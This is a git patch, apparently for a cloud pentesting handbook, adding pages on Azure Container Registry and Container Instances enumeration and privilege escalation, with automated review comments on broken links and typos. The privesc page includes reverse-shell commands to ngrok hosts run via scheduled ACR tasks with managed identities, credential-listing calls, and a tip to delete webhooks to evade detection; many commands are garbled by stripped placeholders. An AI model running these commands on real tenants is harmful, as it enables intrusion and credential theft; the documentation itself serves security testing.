From 0996afea1be78530c250e73001de92d8b398ba7a Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Sun, 12 Jan 2025 19:42:21 +0100 Subject: [PATCH] azure container --- src/SUMMARY.md | 12 +- src/images/registry_roles.png | Bin 0 -> 33553 bytes .../az-container-instances-privesc.md | 76 ++++++++ .../az-container-registry-privesc.md | 143 +++++++++++++++ .../az-services/az-container-instances.md | 47 +++++ .../az-services/az-container-registry.md | 166 ++++++++++++++++++ 6 files changed, 440 insertions(+), 4 deletions(-) create mode 100644 src/images/registry_roles.png create mode 100644 src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md create mode 100644 src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md create mode 100644 src/pentesting-cloud/azure-security/az-services/az-container-instances.md create mode 100644 src/pentesting-cloud/azure-security/az-services/az-container-registry.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index e3e18e17d..7ab73713c 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -408,6 +408,8 @@ - [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md) - [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md) - [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md) + - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md) + - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-instances.md) - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB.md) - [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md) - [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md) 
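Review bot: The second added SUMMARY.md entry is mislabelled: both new lines read `[Az - Container Registry]`, but the second one links to `az-services/az-container-instances.md` and should read `[Az - Container Instances]` so the two services can be told apart in the sidebar.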
@@ -445,7 +447,7 @@ - [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) - - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB-post-exploitation.md) + - [Az - CosmosDB](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md) - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md) - [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) 
@@ -460,14 +462,16 @@ - [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) - [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md) - [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md) - - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB-privesc.md) + - [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-services/az-container-registry-privesc.md) + - [Az - Container Instances Privesc](pentesting-cloud/azure-security/az-services/az-container-instances-privesc.md) + - [Az - CosmosDB Privesc](pentesting-cloud/azure-security/az-services/az-cosmosDB-privesc.md) - [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) - [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) - [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) - [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md) - [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) - - [Az - MySQL](pentesting-cloud/azure-security/az-services/az-mysql-privesc.md) - - [Az - PostgreSQL](pentesting-cloud/azure-security/az-services/az-postgresql-privesc.md) + - [Az - MySQL Privesc](pentesting-cloud/azure-security/az-services/az-mysql-privesc.md) + - [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-services/az-postgresql-privesc.md) - [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) - [Az - Service Bus 
Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md) - [Az - Static Web App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md) 
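Review bot: The two new privesc entries point at the wrong directory: `Az - Container Registry Privesc` and `Az - Container Instances Privesc` link to `pentesting-cloud/azure-security/az-services/...`, but the commit creates both files under `pentesting-cloud/azure-security/az-privilege-escalation/` (see the file list in the patch header), so these links will be dead in the rendered book. While relabelling the CosmosDB, MySQL and PostgreSQL entries it is worth checking their `az-services/...-privesc.md` paths as well, since every other entry in this list lives under `az-privilege-escalation/`.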
diff --git a/src/images/registry_roles.png b/src/images/registry_roles.png new file mode 100644 index 0000000000000000000000000000000000000000..f1d4a361518909201ee9ff872cf1002c4acf238c GIT binary patch literal 33553
--resource-group --exec-command 'ls' +``` + +It's also possible to **read the output** of the container with: + +```bash +az container attach --name --resource-group +``` + +Or get the logs with: + +```bash +az container logs --name --resource-group +``` + +### `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` + +These permissions allows to **attach a user managed identity** to a container group. This is very useful to escalate privileges in the container. + +To attach a user managed identity to a container group: + +```bash +az rest \ + --method PATCH \ + --url "/subscriptions//resourceGroups//providers/Microsoft.ContainerInstance/containerGroups/?api-version=2021-09-01" \ + --body '{ + "identity": { + "type": "UserAssigned", + "userAssignedIdentities": { + "/subscriptions//resourceGroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities/": {} + } + } + }' \ + --headers "Content-Type=application/json" +``` + +### `Microsoft.Resources/subscriptions/resourcegroups/read`, `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` + +These permission allows to **create or update a container group** with a **user managed identity** attached to it. This is very useful to escalate privileges in the container. 
+ +```bash +az container create \ + --resource-group > \ + --name nginx2 \ + --image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \ + --assign-identity "/subscriptions//resourceGroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities/" \ + --restart-policy OnFailure \ + --os-type Linux \ + --cpu 1 \ + --memory 1.0 +``` + +Moreover, it's also possible to update an existing container group adding for example the **`--command-line` argument** with a reverse shell. + +{{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md new file mode 100644 index 000000000..8323131b5 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md 
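Review bot: In `az-container-instances-privesc.md` the `az container create` example has a stray `>` after `--resource-group`; with the trailing backslash the shell treats it as a redirection to the next token (`--name`), so the command breaks. Drop the `>`. The closing paragraph says an existing group can be updated by adding `--command-line`, but unlike every other step on the page no command is shown, so either add the invocation or cut the sentence. Grammar in the two section intros: `These permissions allows to` and `These permission allows to` should read `These permissions allow you to`.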
@@ -0,0 +1,143 @@ +# Az - Azure Container Registry Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Azure Container Registry + +Fore more information check: + +{{#ref}} +../az-services/az-container-registry.md +{{#endref}} + +### `Microsoft.ContainerRegistry/registries/listCredentials/action` + +This permission allows the user to list the admin credentials of the ACR. This is useful to **get full access** over the registry + +```bash +az rest --method POST \ +--url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ContainerRegistry/registries//listCredentials?api-version=2023-11-01-preview" +``` + +In case the admin credentials aren't enabled, you will also need the permission `Microsoft.ContainerRegistry/registries/write` to enable them with: + +```bash +az rest --method PATCH --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ContainerRegistry/registries/?api-version=2023-11-01-preview" --body '{"properties": {"adminUserEnabled": true}}' +``` + + +### `Microsoft.ContainerRegistry/registries/tokens/write`, `Microsoft.ContainerRegistry/registries/generateCredentials/action` + +These permissions allow the user to **create a new token** with passwords to access the registry. 
+ +To use the `az cli`to generate it as in the following example you will also need the permissions `Microsoft.ContainerRegistry/registries/read`, `Microsoft.ContainerRegistry/registries/scopeMaps/read`, `Microsoft.ContainerRegistry/registries/tokens/operationStatuses/read`, `Microsoft.ContainerRegistry/registries/tokens/read` + +```bash +az acr token create \ + --registry \ + --name \ + --scope-map _repositories_admin +``` + + +### `Microsoft.ContainerRegistry/registries/listBuildSourceUploadUrl/action`, `Microsoft.ContainerRegistry/registries/scheduleRun/action`, `Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action` + +These permissions allow the user to **build and run an image** in the registry. This can be used to **execute code** in the container. + +>[!WARNING] +> However, the image will be executed in a **sandboxed environment** and **without access to the metadata service**. This means that the container will not have access to the **instance metadata** so this isn't really useful to escalate privileges + +```bash +# Build +echo 'FROM ubuntu:latest\nRUN bash -c "bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/17585 0>&1"\nCMD ["/bin/bash", "-c", "bash -i >& /dev/tcp//2.tcp.eu.ngrok.io/17585 0>&1"]' > Dockerfile +az acr run --registry 12345TestingRegistry --cmd '$Registry/rev/shell:v1:v1' /dev/null +``` + + +### `Microsoft.ContainerRegistry/registries/tasks/write` + +This is the main permission that allows to create and update a task in the registry. This can be used to **execute a code inside a container with a managed identity attached to it** in the container. 
+ +This is the example on how to execute a reverseh shell in a container with the **system managed** identity attached to it: + +```bash +az acr task create \ + --registry \ + --name reverse-shell-task \ + --image rev/shell:v1 \ + --file ./Dockerfile \ + --context https://github.com/carlospolop/Docker-rev.git \ + --assign-identity \ + --commit-trigger-enabled false \ + --schedule "*/1 * * * *" +``` + +Another way to get a RCE from a task without using an external repository is to use the `az acr task create` command with the `--cmd` flag. This will allow you to run a command in the container. For example, you can run a reverse shell with the following command: + +```bash +az acr task create \ + --registry \ + --name reverse-shell-task-cmd \ + --image rev/shell2:v1 \ + --cmd 'bash -c "bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/15508 0>&1"' \ + --schedule "*/1 * * * *" \ + --context /dev/null \ + --commit-trigger-enabled false \ + --assign-identity +``` + +> [!TIP] +> Note that to assign the system managed identity you don't need any special permission, although it must have been enabled before in the registry and assigned some permissions for it to be useful. 
+ +To assign a **user managed identity also** you would need the permission `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` to do: + +```bash +az acr task create \ + --registry \ + --name reverse-shell-task \ + --image rev/shell:v1 \ + --file ./Dockerfile \ + --context https://github.com/carlospolop/Docker-rev.git \ + --assign-identity \[system\] "/subscriptions/>/resourcegroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities/" \ + --commit-trigger-enabled false \ + --schedule "*/1 * * * *" +``` + +To **update** the repo of an existent task you can do: + +```bash +az acr task update \ + --registry \ + --name reverse-shell-task \ + --context https://github.com/your-user/your-repo.git +``` + + +### `Microsoft.ContainerRegistry/registries/importImage/action` + +With this permission it's possible to **import an image to the azure registry**, even without having the image locally. However, note that you **cannot import an image with a tag** that already exists in the registry. + +```bash +# Push with az cli +az acr import \ + --name \ + --source mcr.microsoft.com/acr/connected-registry:0.8.0 # Example of a repo to import +``` + +In order to **untag or delete a specific image tag** from the registry you can use the following command. However, note that you will need a user or token with **enough permissions** to do it: + +```bash +az acr repository untag \ + --name \ + --image : + +az acr repository delete \ + --name \ + --image : +``` + + + +{{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/pentesting-cloud/azure-security/az-services/az-container-instances.md b/src/pentesting-cloud/azure-security/az-services/az-container-instances.md new file mode 100644 index 000000000..627ebcbf6 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-services/az-container-instances.md 
@@ -0,0 +1,47 @@ +# Az - Container Instances + +{{#include ../../../../banners/hacktricks-training.md}} + +## Basic Information + +Azure Container Instances (ACI) provide a **serverless, on-demand way** to run **containers** in the Azure cloud. You can **deploy** single or multiple containers in a group with **scalable compute**, **networking options**, and the flexibility to connect to **other Azure services** (like Storage, Virtual Networks, or Container Registries). + +As they are **ephemeral** workloads, you don't need to manage the underlying VM infrastructure — Azure handles that for you. However, from an **offensive security perspective**, it's crucial to understand how **permissions**, **identities**, **network configurations**, and **logs** can reveal attack surfaces and potential misconfigurations. + + +### Configurations + +- In order to create a container it's possible to use a public image, a container image from an Azure Container Registry or an external repository, which might **require to configure a password** to access it. +- Regarding networking it can also have a **public IP** or be **private endpoints**. +- It's also possible to configure common docker settings like: + - **Environment variables** + - **Volumes** (even from Azure Files) + - **Ports** + - **CPU and memory limits** + - **Restart policy** + - **Run as privileged** + - **Command line to run** + - ... + + +## Enumeration + +> [!WARNING] +> When enumerating ACI, you can reveal sensitive configurations such as **environment variables**, **network details**, or **managed identities**. Be cautious with logging or displaying them. 
+ +```bash +# List all container instances in the subscription +az container list + +# Show detailed information about a specific container instance +az container show --name --resource-group + +# Fetch logs from a container +az container logs --name --resource-group + +# Execute a command in a running container and get the output +az container exec --name --resource-group --exec-command "ls" + +# Get yaml configuration of the container group +az container export --name --resource-group +``` \ No newline at end of file diff --git a/src/pentesting-cloud/azure-security/az-services/az-container-registry.md b/src/pentesting-cloud/azure-security/az-services/az-container-registry.md new file mode 100644 index 000000000..044cfea3c --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-services/az-container-registry.md 
@@ -0,0 +1,166 @@ +# Az - Container Registry + +{{#include ../../../../banners/hacktricks-training.md}} + +## Basic Information + +Azure Container Registry (ACR) is a secure, private registry that lets you **store, manage, and access container images in the Azure cloud**. It integrates seamlessly with several Azure services, providing automated build and deployment workflows at scale. With features like geo-replication and vulnerability scanning, ACR helps ensure enterprise-grade security and compliance for containerized applications. + +### Permissions + +These are the **different permissions** [according to the docs](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-roles?tabs=azure-cli#access-resource-manager) that can be given over a Container Registry: + +- Access Resource Manager +- Create/delete registry +- Push image +- Pull image +- Delete image data +- Change policies +- Sign images + +There are also some **built-in roles** that can be assigned, and it's also possible to create **custom roles**. + +![]() + +### Authentication + +> [!WARNING] +> It's very imporatant that even if the registry name contains some uppercase letters, you should always use **lowercase letters** to login, push and pull images. + +There are 4 ways to authenticate to an ACR: + +- **With Entra ID**: This is the **default** way to authenticate to an ACR. It uses the **`az acr login`** command to authenticate to the ACR. This command will **store the credentials** in the **`~/.docker/config.json`** file. Moreover, if you are running this command from an environment without access to a docker socket like in a **cloud shell**, it's possible to use the **`--expose-token`** flag to get the **token** to authenticate to the ACR. 
Then to authenticate you need to use as user name `00000000-0000-0000-0000-000000000000` like: `docker login myregistry.azurecr.io --username 00000000-0000-0000-0000-000000000000 --password-stdin <<< $TOKEN` +- **With an admin account**: The admin user is disabled by default but it can be enabled and then it'll be possible to access the registry with the **username** and **password** of the admin account with full permissions to the registry. This is still supported because some Azure services use it. Note that **2 passwords** are created for this user and both are valid. You can enable it with `az acr update -n --admin-enabled true`. Note that the username is usually yhe registry name (and not `admin`). +- **With a token**: It's possible to create a **token** with a **specific `scope map`** (permissions) to access the registry. Then, it's possible to use this token name as username and some of the generated password to authenticate to the registry with `docker login -u -p aregistry-url>` +- **With a Service Principal**: It's possible to create a **service principal** and assign a role like **`AcrPull`** to pull images. Then, it'll be possible to **login to the registry** using the SP appId as username and a generated secret as password. 
+ +Example script from the [docs](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-auth-service-principal) to generate a SP with access over a registry: + +```bash +#!/bin/bash +ACR_NAME=$containerRegistry +SERVICE_PRINCIPAL_NAME=$servicePrincipal + +# Obtain the full registry ID +ACR_REGISTRY_ID=$(az acr show --name $ACR_NAME --query "id" --output tsv) + +PASSWORD=$(az ad sp create-for-rbac --name $SERVICE_PRINCIPAL_NAME --scopes $ACR_REGISTRY_ID --role acrpull --query "password" --output tsv) +USER_NAME=$(az ad sp list --display-name $SERVICE_PRINCIPAL_NAME --query "[].appId" --output tsv) + +echo "Service principal ID: $USER_NAME" +echo "Service principal password: $PASSWORD" +``` + +### Encryption + +Only the **Premium SKU** supports **encryption at rest** for the images and other artifacts. + +### Networking + +Only the **Premium SKU** supports **private endpoints**. The other ones only support **public access**. A public endpoint has the format `.azurecr.io` and a private endpoint has the format `.privatelink.azurecr.io`. For this reason, the name of the registry must be unique across all Azure. + +### Microsoft Defender for Cloud + +This allows you to **scan the images** in the registry for **vulnerabilities**. + +### Soft-delete + +The **soft-delete** feature allows you to **recover a deleted registry** within the indicated number of days. This feature is **disabled by default**. + +### Webhooks + +It's possible to **create webhooks** inside registries. In this webhook it's needed to specify the URL where a **request will be sent whenever a push or delete action is performed**. Moreover, Webhooks can indicate a scope to indicate the repositories (images) that will be affected. For example, 'foo:*' means events under repository 'foo'. + +From an attackers perspective it's interesting to check this **before performing any action** in the registry, and remove it terporarely if needed, to avoid being detected. 
+ +### Connected registries + +This basically allows to **mirror the images** from one registry to another one, usually located on-premises. + +It has 2 modes: **ReadOnly** and **ReadWrite**. In the first one, the images are only **pulled** from the source registry, and in the second one, images can also be **pushed** to the source registry. + +In order for clients to access the registry from Azure, a **token** is generated when the conected registry is used. + +### Runs & Tasks + +Runs & Tasks allows to execute in Azure container related actions that you typically needed to do locally or in a CI/CD pipeline. For example, you can **build, push, and run images in the registry**. + +The easiest way to build and run a container is using a regular Run: + +```bash +# Build +echo "FROM mcr.microsoft.com/hello-world" > Dockerfile +az acr build --image sample/hello-world:v1 --registry mycontainerregistry008 --file Dockerfile . + +# Run +az acr run --registry mycontainerregistry008 --cmd '$Registry/sample/hello-world:v1' /dev/null +``` + +However, that will trigger runs that aren't super interesting from an attackers perspective cause they don't have any managed identity attached to them. + +However, **tasks** can have a **system and user managed identity** attached to them. There tasks are the ones useful to **escalate privileges** in the container. In privileges escalation section it's possible to see how to use tasks to escalate privileges. + +### Cache + +The cache feature allows to **download images from an external repository** and store the new versions in the registry. It requires to have some **credentials configured** by selecting the credentials from an Azure Vault. + +This is very interesting from a attacker's perspective because it allows to **pivot to an external platform** if the attacker has enough permissions to access the credentials, **download images from an external repository** and configuring a cache could also be used as **persistence mechanism**. 
+ +## Enumeration + +> [!WARNING] +> It's very important that even if the registry name contains some uppercase letters, you should only use lowercase letters in the url to access it. + +```bash +# List of all the registries +# Check the network, managed identities, adminUserEnabled, softDeletePolicy, url... +az acr list + +# Get the details of a registry +az acr show --name + +# List tokens of a registry +az acr token list --registry --resource-group + +# List repositories in a registry +az acr repository list --name --resource-group + +# List the tags of a repository +az acr repository show-tags --repository --name --resource-group + +# List deleted repository tags +## At the time of this writing there isn't yet any command to restore it +az acr repository list-deleted --name + +# List tasks +## Check the git URL or the command +az acr task list --registry + +# List tasks runs +az acr task list-runs --registry + +# List connected registries +az acr connected-registry list --registry + +# List cache +az acr cache list --registry + +# Get cache details +az acr cache show --name --registry +``` + +## Privilege Escalation & Post Exploitation + +{{#ref}} +../az-privilege-escalation/az-automation-accounts-privesc.md +{{#endref}} + +## References + +- [https://learn.microsoft.com/en-us/azure/container-registry/container-registry-authentication?tabs=azure-cli](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-authentication?tabs=azure-cli) +- [https://learn.microsoft.com/en-us/azure/container-registry/container-registry-roles?tabs=azure-cli#access-resource-manager](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-roles?tabs=azure-cli#access-resource-manager) + +{{#include ../../../../banners/hacktricks-training.md}} + + +
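Review bot: In the remainder of the `az-container-registry-privesc.md` hunk (the one that ends just before the `diff --git` header for `az-container-instances.md`), several commands have flags with no argument: `az acr token create --registry \ --name \`, `az acr import --name \`, `az acr repository untag --name \ --image :`, `az acr repository delete --name \ --image :` and the `--registry \` in every `az acr task create`/`update` example. If these were written as `<registry>`-style placeholders they are being swallowed by the renderer; use a form like `REGISTRY_NAME` (or escape the angle brackets) so the commands are copyable. The user-assigned identity example also carries a stray `>` in `/subscriptions/>/resourcegroups//providers/...` and unnecessary backslash escapes in `--assign-identity \[system\]` inside a fenced block. The first build example is inconsistent with itself: the `az acr run --cmd` line references `$Registry/rev/shell:v1:v1` (doubled tag) and no `az acr build` precedes it, so the run cannot resolve the image; either add the build step or trim the snippet, especially since the warning right above it already says this path is not useful for escalation. Wording: "reverseh shell" -> "reverse shell"; "allows to create and update a task" -> "allows creating and updating a task"; "execute a code inside a container with a managed identity attached to it in the container" has a redundant tail. For the untag/delete paragraph, "a user or token with enough permissions" should name the permission (the registry page in this same patch lists "Delete image data" among the documented actions). Finally, this file includes the banner as `{{#include ../../../banners/hacktricks-training.md}}` while the two new `az-services` pages, which sit at the same directory depth, use `../../../../banners/...`; one of the two paths must be wrong.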
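Review bot: The `az-container-instances.md` hunk ends with `\ No newline at end of file` and, unlike the other two new pages, has no closing `{{#include ../../../../banners/hacktricks-training.md}}`; add the trailing newline and the closing banner for consistency. Every command in the enumeration block (`az container show --name --resource-group`, `logs`, `exec`, `export`) is missing the arguments for `--name` and `--resource-group`, the same placeholder-stripping problem seen in the registry files, so the block is not copyable as rendered. In the Configurations list, "which might require to configure a password" -> "which may require configuring a password", and "can also have a public IP or be private endpoints" -> "can have a public IP or use private endpoints". The enumeration warning correctly says `az container show`/`export` can expose environment variables and identity details; it would help readers to say that those values should be treated as secrets when captured in notes or logs rather than just "be cautious". The page also has no "Privilege Escalation & Post Exploitation" section with a `{{#ref}}` like the registry page does; adding one pointing at the matching privesc page would keep the two new service pages parallel.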
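Review bot: The `{{#ref}}` under "Privilege Escalation & Post Exploitation" in `az-container-registry.md` points at `../az-privilege-escalation/az-automation-accounts-privesc.md`, which is the Automation Accounts page, not the container registry privesc page whose content appears earlier in this patch; fix the target. The `![]()` under "Permissions" is an empty image reference with neither a path nor alt text. The token login example `docker login -u -p aregistry-url>` has lost its placeholders and carries a stray `>`, and the same stripping affects `az acr update -n --admin-enabled true` and the whole enumeration block (`az acr show --name`, `az acr token list --registry --resource-group`, `az acr repository show-tags --repository --name --resource-group`, `az acr cache show --name --registry`, etc.), none of which have arguments as rendered. Typos and grammar: "imporatant" -> "important", "yhe registry name" -> "the registry name", "terporarely" -> "temporarily", "conected" -> "connected", "There tasks" -> "These tasks", "attackers perspective" -> "attacker's perspective", "a attacker's" -> "an attacker's", "Runs & Tasks allows to execute in Azure container related actions that you typically needed to do locally" -> "Runs & Tasks let you execute, in Azure, container-related actions that you would typically run locally", and "It requires to have some credentials configured" -> "It requires credentials to be configured". The lowercase-registry-name warning appears verbatim under both "Authentication" and "Enumeration"; one copy is enough. Under "Encryption", "Only the Premium SKU supports encryption at rest" reads as if Basic and Standard registries stored images unencrypted; if the intended point is customer-managed key encryption, say that explicitly.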